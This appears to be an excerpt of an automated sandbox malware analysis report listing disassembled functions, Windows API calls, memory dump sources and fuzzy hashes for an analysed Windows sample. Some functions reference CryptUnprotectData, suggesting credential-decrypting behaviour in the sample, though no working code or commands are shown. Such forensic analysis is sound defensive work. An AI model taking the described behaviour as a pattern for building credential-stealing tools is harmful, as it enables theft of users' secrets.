                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: fed3ee901d711fa1823843e32a0ba56fe27f49a1c501ca42d34ddb7cb0dfa805
                              • Instruction ID: f16633f7a1eaf696929c16232073ae3374e243e5ee2cd178aa076d9bf36fa1ec
                              • Opcode Fuzzy Hash: fed3ee901d711fa1823843e32a0ba56fe27f49a1c501ca42d34ddb7cb0dfa805
                              • Instruction Fuzzy Hash: 3A016DB5A01309AFE710DFA4DC49FABB778EB44B04F104554FA00AB284D7B59A00CBE4
                              Function 0119DD9D Relevance: 2.6, Strings: 2, Instructions: 146COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: _xw^$rB]o
                              • API String ID: 0-2137878691
                              • Opcode ID: e404783061543ed38dc5228f56f302c4f688f78af4ed9557df4c7c4b8829fc86
                              • Instruction ID: 59c48c9846ddededc0a7a00bef18ec85b02386715d7d2c52ffb4401c4e74fe3f
                              • Opcode Fuzzy Hash: e404783061543ed38dc5228f56f302c4f688f78af4ed9557df4c7c4b8829fc86
                              • Instruction Fuzzy Hash: B04115B39183189BE354BE38DC8876AF7E5EF54310F174A3C9AC593740E97919118687
                              Function 011F1E6E Relevance: 2.0, Strings: 1, Instructions: 740COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: {:qK
                              • API String ID: 0-1672235112
                              • Opcode ID: 0fa08a3bf7a88135eaa9921601958297eae1aceafed4a3822c4cdd767a755e4b
                              • Instruction ID: 502db3a4e5ea11f3b074265e59e5163d46593030f7a6e0e9f3c8f333260d0db9
                              • Opcode Fuzzy Hash: 0fa08a3bf7a88135eaa9921601958297eae1aceafed4a3822c4cdd767a755e4b
                              • Instruction Fuzzy Hash: 253226F3A0C2149FE304AE2DDC8567AFBE5EF84720F1A4A3DEAC587744E63558058687
                              Function 01143A5F Relevance: 1.5, Strings: 1, Instructions: 215COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 2v__
                              • API String ID: 0-3991795242
                              • Opcode ID: 7dd90d984f5237e7c90ac2cc066cc3cbbcd605dabe649a79c60c781039911406
                              • Instruction ID: 3ded12e9c3c1fe4b8c3262a389974041dda2d28696a79ce934d4979db2dc9468
                              • Opcode Fuzzy Hash: 7dd90d984f5237e7c90ac2cc066cc3cbbcd605dabe649a79c60c781039911406
                              • Instruction Fuzzy Hash: B9512CF3D182145FF300692CEC457AABBD9EF94720F1A053DEAD8D3780E9799D058296
                              Function 010E47E5 Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: D]t{
                              • API String ID: 0-3721574867
                              • Opcode ID: 1773bc63bd121b8b5efb146401d724a0f2b2e7d83145d74ea7c0857910b25d1f
                              • Instruction ID: 20287a49c903cb4c2a40812bd17cc5c3048865ab432ec216e5369fc6cea2e9c7
                              • Opcode Fuzzy Hash: 1773bc63bd121b8b5efb146401d724a0f2b2e7d83145d74ea7c0857910b25d1f
                              • Instruction Fuzzy Hash: C35128F360C6085FE344AE3DEC85776BBD9DBD4724F19823DE688C2B44F87999014255
                              Function 0116C09C Relevance: 1.4, Strings: 1, Instructions: 178COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: }}
                              • API String ID: 0-3649945341
                              • Opcode ID: 72fc11f91228ba3eb8a03a321ca5fc65c4e8bb7e42e299bd090525bb5d838a82
                              • Instruction ID: 9018912085d770658c2b6c935023b366d968204c3ed8fc37e181ae4617fa4347
                              • Opcode Fuzzy Hash: 72fc11f91228ba3eb8a03a321ca5fc65c4e8bb7e42e299bd090525bb5d838a82
                              • Instruction Fuzzy Hash: 145148F3A081045BE7089E2DDC14B3AB7D6EFD8320F1A493DEAC9D7784E9355C158686
                              Function 011D88A2 Relevance: 1.4, Strings: 1, Instructions: 169COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: z9tI
                              • API String ID: 0-1244595261
                              • Opcode ID: 7b8c1af4c2f5120645a3386ad2f6f05179947933fb408d8267c378d2aa847e47
                              • Instruction ID: c0bcc1a78a36e112b5fbedb2dd3373ef39880d425e6e81e8de4da3726f2a0163
                              • Opcode Fuzzy Hash: 7b8c1af4c2f5120645a3386ad2f6f05179947933fb408d8267c378d2aa847e47
                              • Instruction Fuzzy Hash: FC5126F3B183009BF3049D79EDC57A77696EBC4720F2A863DDB8493B88D97C48064285
                              Function 010CBE88 Relevance: .2, Instructions: 232COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8a2e6d674605c7045e0b239b02532674c6b601f279007074aab0d23c07e454dd
                              • Instruction ID: bf92abd064a4d32f609fee13c71d85835b75dc0b671e0f3891a5bb5448f8da76
                              • Opcode Fuzzy Hash: 8a2e6d674605c7045e0b239b02532674c6b601f279007074aab0d23c07e454dd
                              • Instruction Fuzzy Hash: AA6128F3A0C2045FF3086E2DEC8577ABBE9EB84720F16463DEAC5C7344E97558058696
                              Function 010B1CCF Relevance: .2, Instructions: 154COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f9d1ff5638686cc1da2423075cfb6e29b792bc79c159e283e9d00af1600c8a64
                              • Instruction ID: 9ecfe5d534dc02f5272ccab2a330aa0c7efd1172031425726b2ffe5f0b6f23bf
                              • Opcode Fuzzy Hash: f9d1ff5638686cc1da2423075cfb6e29b792bc79c159e283e9d00af1600c8a64
                              • Instruction Fuzzy Hash: 6E41FBF3A086148BE304AF29DC4473AF7D6EBD0720F1A853DD9C897784D97858468782
                              Function 01269758 Relevance: .1, Instructions: 84COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 14844281e63870e332eb11bdb43d11cdcc21e7d3b1f323403aaaed509eb809fe
                              • Instruction ID: 5fff2faad9cd96928d48cec510cec1e4d604cf5884a875e9c530bd39d4a47789
                              • Opcode Fuzzy Hash: 14844281e63870e332eb11bdb43d11cdcc21e7d3b1f323403aaaed509eb809fe
                              • Instruction Fuzzy Hash: 6321C7F26082089FE705BE2ADC8276EB7E6EFD4221F1A853CDBC443314EA3165158697
                              Function 00E485B0 Relevance: 69.4, APIs: 45, Strings: 1, Instructions: 449stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 00E48636
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4866D
                              • lstrcpy.KERNEL32(?,00000000), ref: 00E486AA
                              • StrStrA.SHLWAPI(?,00D2F308), ref: 00E486CF
                              • lstrcpyn.KERNEL32(010693D0,?,00000000), ref: 00E486EE
                              • lstrlen.KERNEL32(?), ref: 00E48701
                              • wsprintfA.USER32 ref: 00E48711
                              • lstrcpy.KERNEL32(?,?), ref: 00E48727
                              • StrStrA.SHLWAPI(?,00D2F2D8), ref: 00E48754
                              • lstrcpy.KERNEL32(?,010693D0), ref: 00E487B4
                              • StrStrA.SHLWAPI(?,00D2F3C8), ref: 00E487E1
                              • lstrcpyn.KERNEL32(010693D0,?,00000000), ref: 00E48800
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                              • String ID: %s%s
                              • API String ID: 2672039231-3252725368
                              • Opcode ID: d11755d124eea26586b95bc75f1afba877296f85553b5b6e36cb9924a371c190
                              • Instruction ID: 09980da76fefdfef0756f72cc5bd87bb183765173bfad781dc79e9a5166deb4e
                              • Opcode Fuzzy Hash: d11755d124eea26586b95bc75f1afba877296f85553b5b6e36cb9924a371c190
                              • Instruction Fuzzy Hash: 16F16E71900218EFDB20DB64DD4CADEB7B9EF48304F109559FA89E7254DB35AE05CBA0
                              Function 00E31F79 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E31F9F
                              • lstrlen.KERNEL32(00D28C08), ref: 00E31FAE
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E31FDB
                              • lstrcat.KERNEL32(00000000,?), ref: 00E31FE3
                              • lstrlen.KERNEL32(00E61794), ref: 00E31FEE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3200E
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E3201A
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E32042
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3204D
                              • lstrlen.KERNEL32(00E61794), ref: 00E32058
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E32075
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E32081
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E320AC
